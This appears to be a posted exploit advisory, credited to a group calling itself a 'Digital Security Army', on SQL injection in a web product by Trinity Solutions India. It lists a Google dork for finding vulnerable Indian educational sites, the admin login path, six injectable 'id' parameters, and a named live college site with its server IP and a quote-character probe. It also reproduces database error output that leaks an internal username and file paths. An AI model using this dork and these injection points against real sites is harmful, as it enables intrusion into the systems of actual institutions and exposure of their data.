facebook facebook twitter rss

Trinity Solutions India SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019

# Exploit Title : Trinity Solutions India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : trinitysolutions.in
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Powered by Trinity Solutions'' site:edu.in
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

######################################################

# Admin Panel Login Path :
************************

/ritcohm/admin/
[PATH]/admin/

######################################################

# SQL Injection Exploit :
**********************

[PATH]/index.php?id=[SQL Injection]

[PATH]/admin/dbinfo.php?id=[SQL Injection]

[PATH]/admin/lib/getval.php?id=[SQL Injection]

[PATH]/facilities.php?id=[SQL Injection]

[PATH]/include/right_gallery.php?id=[SQL Injection]

[PATH]/include/footerfiles.php?id=[SQL Injection]

######################################################

# Example Vulnerable Site =>
**************************

Note => (166.62.10.139) => There are 1,479 domains hosted on this server.

[+] ritcohm.rit.edu.in/ritcohm/include/right_gallery.php?id=1%27 =>

[Proof of Concept] => archive.fo/OtUVd

######################################################

# SQL Database Error :
***********************

Deprecated: mysql_query(): The mysql extension is deprecated and
will be removed in the future: use mysqli or PDO instead in /home/newpanelritee
/public_html/ritcohm/ritcohm/include/right_gallery.php on line 12

Warning: mysql_query(): Access denied for user 'newpanelritee'@'localhost'
(using password: NO) in /home/newpanelritee/public_html
/ritcohm/ritcohm/include/right_gallery.php on line 12

Warning: mysql_query(): A link to the server could not be established in
/home/newpanelritee/public_html/ritcohm/ritcohm/include
/right_gallery.php on line 12

Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /home/newpanelritee/public_html/ritcohm
/ritcohm/include/right_gallery.php on line 13

######################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

Like us on Facebook :